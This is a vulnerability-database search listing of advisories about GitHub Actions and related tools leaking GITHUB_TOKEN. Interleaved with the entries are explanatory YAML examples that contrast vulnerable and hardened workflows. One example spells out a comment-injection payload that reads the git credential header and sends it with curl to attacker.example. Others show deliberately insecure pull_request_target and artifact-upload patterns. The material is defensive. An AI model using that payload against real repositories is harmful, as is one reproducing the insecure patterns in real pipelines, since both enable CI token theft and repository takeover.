
181 matches found

Positive Technologies · added 2025/05/28 12:00 a.m. · 2 views

PT-2025-24345 · GitHub Actions · Broadinstitute/Cromwell

Summary: Using the issue_comment trigger in .github/workflows/scalafmt-fix.yml, an attacker can inject malicious code through github.event.comment.body. By exploiting the vulnerability, it is possible to exfiltrate a high-privileged GITHUB_TOKEN, which can be used to completely take over the repo since the token has...

CVSS 9.1 · AI score 7.5 · Exploits 0 · References 4
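The Cromwell entry above describes the classic expression-injection pattern: a value the commenter controls is expanded into a `run:` script. The following is an added illustration, not the Cromwell project's own scalafmt-fix.yml; the file name, the `/fmt` command and the sbt invocation are assumptions made for this example.

```yaml
# Added example (not the Cromwell project's workflow): two versions of an
# issue_comment workflow. File name, '/fmt' command and sbt call are assumed.

# .github/workflows/fmt-on-comment.yml  -- VULNERABLE, do not use
#
# ${{ }} expressions are substituted into the script text before the shell
# sees it, so the comment author controls part of the script. A comment like
#   /fmt"; git config --get http.https://github.com/.extraheader | curl -d @- https://attacker.example/; echo "
# closes the echo string, reads the token that actions/checkout stored in
# .git/config, posts it off-box, and reopens the string so the script parses.
name: fmt-on-comment
on:
  issue_comment:
    types: [created]
jobs:
  fmt:
    if: github.event.issue.pull_request && startsWith(github.event.comment.body, '/fmt')
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4          # persist-credentials defaults to true
      - run: |
          echo "triggered by: ${{ github.event.comment.body }}"
          sbt scalafmtAll
---
# .github/workflows/fmt-on-comment.yml  -- HARDENED
#
# The untrusted value reaches the step only as an environment variable, which
# the shell treats as data; the job token is read-only and is not left behind
# in .git/config for an injected command to read.
name: fmt-on-comment
on:
  issue_comment:
    types: [created]
permissions:
  contents: read
jobs:
  fmt:
    if: github.event.issue.pull_request && startsWith(github.event.comment.body, '/fmt')
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          persist-credentials: false
      - env:
          COMMENT_BODY: ${{ github.event.comment.body }}
        run: |
          printf 'triggered by: %s\n' "$COMMENT_BODY"
          sbt scalafmtAll
```

The `env:` indirection is the fix for the injection itself; `permissions:` and `persist-credentials: false` only limit what a successful injection could take. On a public repository anyone can comment on an issue or pull request, so `issue_comment` input is exactly as untrusted as a fork's pull request. If the job genuinely has to push a formatting commit, grant `contents: write` to that one job rather than to the whole workflow.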
RedhatCVE · added 2025/05/23 7:12 a.m. · 7 views

CVE-2024-35183

wolfictl is a command line tool for working with Wolfi. A git authentication issue in versions prior to 0.16.10 allows a local user’s GitHub token to be sent to remote servers other than github.com. Most git-dependent functionality in wolfictl relies on its own git package, which contains...

CVSS 4.4 · AI score 5.1 · EPSS 0.00237 · Exploits 0 · References 1
RedhatCVE · added 2025/05/22 9:19 p.m. · 8 views

CVE-2021-32724

check-spelling is a GitHub Action which provides CI spell checking. In affected versions, and for a repository with the check-spelling action enabled that triggers on pull_request_target or schedule, an attacker can send a crafted Pull Request that causes a GITHUB_TOKEN to be exposed. With the...

CVSS 9.9 · AI score 6.8 · EPSS 0.0226 · Exploits 0 · References 1
RedhatCVE · added 2025/05/22 9:19 p.m. · 7 views

CVE-2021-32638

GitHub's CodeQL action is provided to run CodeQL-based code scanning on non-GitHub CI/CD systems and requires a GitHub access token to connect to a GitHub repository. The runner and its documentation previously suggested passing the GitHub token as a command-line parameter to the process instead ...

CVSS 4.4 · AI score 7.3 · EPSS 0.004 · Exploits 1 · References 1
RedhatCVE · added 2025/05/22 7:36 p.m. · 8 views

CVE-2021-29642

GistPad before 0.2.7 allows a crafted workspace folder to change the URL for the Gist API, which leads to leakage of GitHub access tokens...

CVSS 5.3 · AI score 6.8 · EPSS 0.00944 · Exploits 0 · References 1
OSV · added 2025/05/15 8:16 p.m. · 2 views

UBUNTU-CVE-2025-47928

Spotipy is a Python library for the Spotify Web API. As of commit 4f5759dbfb4506c7b6280572a4db1aabc1ac778d, using pull_request_target in .github/workflows/integration_tests.yml followed by checking out the head.sha of a forked PR can be exploited by attackers, since untrusted code can be execute...

CVSS 9.1 · AI score 5.9 · EPSS 0.00404 · Exploits 0 · References 5
Cvelist · added 2025/05/15 8:09 p.m. · 21 views

CVE-2025-47928 Spotipy repo vulnerable to secrets exfiltration via `pull_request_target`

Spotipy is a Python library for the Spotify Web API. As of commit 4f5759dbfb4506c7b6280572a4db1aabc1ac778d, using pull_request_target in .github/workflows/integration_tests.yml followed by checking out the head.sha of a forked PR can be exploited by attackers, since untrusted code can be execute...

CVSS 9.1 · EPSS 0.00404 · Exploits 0 · References 3
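The check-spelling (CVE-2021-32724) and Spotipy (CVE-2025-47928) entries share one root cause: a `pull_request_target` workflow checks out the fork's head commit and then executes something from it while the base repository's secrets and a write-capable GITHUB_TOKEN are in reach. The following is an added example, not Spotipy's or check-spelling's workflow; the secret name `SERVICE_SECRET`, the test paths and the `safe-to-test` label are assumptions made for illustration.

```yaml
# Added example (not Spotipy's or check-spelling's workflow). SERVICE_SECRET,
# the tests/ paths and the 'safe-to-test' label are assumed names.

# .github/workflows/integration.yml  -- VULNERABLE, do not use
#
# pull_request_target runs in the base repository's context: secrets are
# available and GITHUB_TOKEN is write-capable unless restricted. Checking out
# the PR head and executing anything from it (setup.py via pip, a test module,
# a Makefile) hands that context to the fork author.
name: integration
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}   # fork-controlled code
      - run: pip install -e .                              # executes the fork's setup.py
      - run: pytest tests/integration
        env:
          SERVICE_SECRET: ${{ secrets.SERVICE_SECRET }}     # readable by that code
---
# .github/workflows/integration.yml  -- HARDENED
#
# Untrusted code runs under pull_request, where fork PRs get a read-only token
# and no secrets. Secret-bearing tests run only when a maintainer applies a
# label; the trigger is the labeling event itself, so a later push does not
# re-run with secrets until the label is applied again.
name: integration
on:
  pull_request:
  pull_request_target:
    types: [labeled]
permissions:
  contents: read
jobs:
  unit:
    if: github.event_name == 'pull_request'
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          persist-credentials: false
      - run: pip install -e .
      - run: pytest tests/unit
  integration:
    if: github.event_name == 'pull_request_target' && github.event.label.name == 'safe-to-test'
    runs-on: ubuntu-latest
    environment: integration          # environment secrets: only this job can read them
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}   # the commit the maintainer reviewed
          persist-credentials: false
      - run: pip install -e .
      - run: pytest tests/integration
        env:
          SERVICE_SECRET: ${{ secrets.SERVICE_SECRET }}
```

The label gate still has a window: the label is attached to the pull request, not to a commit, so a push between review and labeling would be run with secrets. Closing that window means re-checking the head SHA immediately before labeling, or automation that strips the label on every `synchronize` event. Where no secret is actually needed, the right answer is simply `pull_request`.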
CNNVD · added 2025/05/06 12:00 a.m. · 3 views

DOM security vulnerability

DOM is a DOM interface open-sourced by PHP.GT. A security vulnerability exists in DOM versions prior to 4.1.8, which stems from the exposure of GITHUB_TOKEN in the Dom workflow run artifact...

CVSS 7.1 · AI score 6.5 · EPSS 0.00163 · Exploits 0 · References 3
Positive Technologies · added 2025/05/06 12:00 a.m. · 3 views

PT-2025-19986 · Phpgt/Dom · Phpgt/Dom

Name of the Vulnerable Software and Affected Versions: phpgt/Dom versions prior to 4.1.8. Description: The issue exposes the GITHUB_TOKEN in the Dom workflow run artifact. This occurs because the ci.yml workflow file uses actions/upload-artifact@v4 to upload the build artifact, which is a zip of t...

CVSS 7.1 · AI score 6.4 · EPSS 0.00163 · Exploits 0 · References 9
NVD · added 2025/04/21 9:15 p.m. · 13 views

CVE-2025-32958

Adept is a language for general purpose programming. Prior to commit a1a41b7, the remoteBuild.yml workflow file uses actions/upload-artifact@v4 to upload the mac-standalone artifact. This artifact is a zip of the current directory, which includes the automatically generated .git/config file...

CVSS 9.8 · EPSS 0.00483 · Exploits 0 · References 2
CNNVD · added 2025/04/21 12:00 a.m. · 1 view

Adept information disclosure vulnerability

Adept is a programming language open-sourced by AdeptLanguage. An information disclosure vulnerability exists in Adept versions prior to commit a1a41b7, which stems from the remoteBuild.yml workflow file potentially disclosing GITHUB_TOKEN, which could allow malicious code to be pushed...

CVSS 9.8 · AI score 6 · EPSS 0.00483 · Exploits 0 · References 2
Positive Technologies · added 2025/04/21 12:00 a.m. · 3 views

PT-2025-17465 · Adept · Adept

Name of the Vulnerable Software and Affected Versions: Adept versions prior to commit a1a41b7. Description: The issue concerns the exposure of the GITHUB_TOKEN in the Adept language workflow. Prior to commit a1a41b7, the remoteBuild.yml workflow file uses actions/upload-artifact@v4 to upload the...

CVSS 9.8 · AI score 6.5 · EPSS 0.00483 · Exploits 0 · References 15
NVD · added 2025/04/18 9:15 p.m. · 33 views

CVE-2025-32953

z80pack is a mature emulator of multiple platforms with 8080 and Z80 CPU. In version 1.38 and prior, the makefile-ubuntu.yml workflow file uses actions/upload-artifact@v4 to upload the z80pack-ubuntu artifact. This artifact is a zip of the current directory, which includes the automatically...

CVSS 8.7 · EPSS 0.00442 · Exploits 0 · References 5
Positive Technologies · added 2025/04/18 12:00 a.m. · 3 views

PT-2025-17346 · Z80Pack · Z80Pack

Name of the Vulnerable Software and Affected Versions: z80pack versions 1.38 and prior. Description: The issue concerns the exposure of sensitive information, specifically the GITHUB_TOKEN, in the workflow run artifact. This occurs because the makefile-ubuntu.yml workflow file uses...

CVSS 8.7 · AI score 6.4 · EPSS 0.00442 · Exploits 0 · References 14
CNNVD · added 2025/04/18 12:00 a.m. · 3 views

z80pack information disclosure vulnerability

z80pack is a Zilog Z80 and Intel 8080 system emulator by the individual developer Udo Munk. An information disclosure vulnerability exists in z80pack version 1.38 and earlier, which stems from the makefile-ubuntu.yml workflow file potentially disclosing GITHUB_TOKEN...

CVSS 8.7 · AI score 6.1 · EPSS 0.00442 · Exploits 0 · References 5
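The phpgt/Dom, Adept and z80pack entries are the same bug three times: `actions/checkout` leaves the job's GITHUB_TOKEN in `.git/config` so later git commands can authenticate, and `actions/upload-artifact` is pointed at the repository root, so the token ships inside the artifact. The following is an added example, not any of those projects' workflows; the build command, artifact name and `dist/` path are assumptions made for illustration.

```yaml
# Added example (not the phpgt/Dom, Adept or z80pack workflows). The make
# target, artifact name and dist/ path are assumed.

# .github/workflows/build.yml  -- VULNERABLE, do not use
#
# actions/checkout stores the token in .git/config by default, as the
# http.https://github.com/.extraheader value "AUTHORIZATION: basic <base64>".
# Archiving the whole working tree puts that file in the artifact, and anyone
# who can download the artifact can use the token until the job finishes.
name: build
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4          # persist-credentials defaults to true
      - run: make
      - uses: actions/upload-artifact@v4
        with:
          name: build
          path: .                          # includes .git/config
---
# .github/workflows/build.yml  -- HARDENED
name: build
on: [push]
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          persist-credentials: false       # nothing to leak even if .git were archived
      - run: make
      - name: Refuse to upload anything that still carries a git auth header
        run: |
          if grep -rIq 'AUTHORIZATION: basic' --include=config dist/ 2>/dev/null; then
            echo '::error::dist/ contains a git credential header'
            exit 1
          fi
      - uses: actions/upload-artifact@v4
        with:
          name: build
          path: dist/                      # build output only, never the repository root
```

`persist-credentials: false` removes the credential at the source; the narrowed `path:` removes the channel; the grep step is a tripwire for the case where a build script copies the tree somewhere under `dist/`. On a public repository the artifact is downloadable by any logged-in GitHub user, so an exposed token is usable by anyone until the job ends, and a job that runs for a long time after the upload step (or a workflow that keeps the token alive by waiting) widens that window; the read-only `permissions:` block caps what a stolen token can do in the meantime.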
Vulnrichment · added 2025/04/02 9:09 p.m. · 17 views

CVE-2025-31479 canonical/get-workflow-version-action can leak a partial GITHUB_TOKEN in exception output

canonical/get-workflow-version-action is a GitHub composite action to get the commit SHA that a GitHub Actions reusable workflow was called with. Prior to 1.0.1, if the get-workflow-version-action step fails, the exception output may include the GITHUB_TOKEN. If the full token is included in the excepti...

CVSS 8.2 · AI score 6.7 · EPSS 0.00517 · Exploits 0 · References 3
CNNVD · added 2025/04/02 12:00 a.m. · 3 views

get-workflow-version-action log information disclosure vulnerability

get-workflow-version-action is a Canonical open-source tool. A log information disclosure vulnerability exists in get-workflow-version-action versions prior to 1.0.1, which stems from the exception output possibly containing GITHUB_TOKEN, which could lead to information disclosure...

CVSS 8.2 · AI score 5.8 · EPSS 0.00517 · Exploits 0 · References 4
OSV · added 2025/01/26 6:01 p.m. · 4 views

MAL-2025-191738 Malicious code in getpublicip (PyPI)

Source: kam193 (041ba7130d1460fe6480d062c61c78db3b88cc5c6d060913d0501fdbdc7c35b0). If installed from the source package, the package collects selected environment variables, including GITHUB_TOKEN if set, and sends them to an external service. The...

AI score 7.5 · Exploits 0 · References 1
OSV · added 2025/01/24 6:44 p.m. · 5 views

GHSA-VQF5-2XX6-9WFM GitHub PAT written to debug artifacts

Impact summary In some circumstances, debug artifacts uploaded by the CodeQL Action after a failed code scanning workflow run may contain the environment variables from the workflow run, including any secrets that were exposed as environment variables to the workflow. Users with read access to th...

CVSS 7.1 · AI score 5.9 · EPSS 0.00892 · Exploits 0 · References 10
CVE · added 2025/01/24 6:04 p.m. · 74 views

CVE-2025-24362

CVE-2025-24362 concerns CodeQL Action when debug artifacts are enabled. In certain failed CodeQL analyses on Java/Kotlin repos, the uploaded debug artifacts could contain environment variables from the workflow run, including secrets such as the GITHUB_TOKEN. The token could be valid for the dura...

CVSS 7.1 · AI score 6.9 · EPSS 0.00892 · Exploits 0 · References 8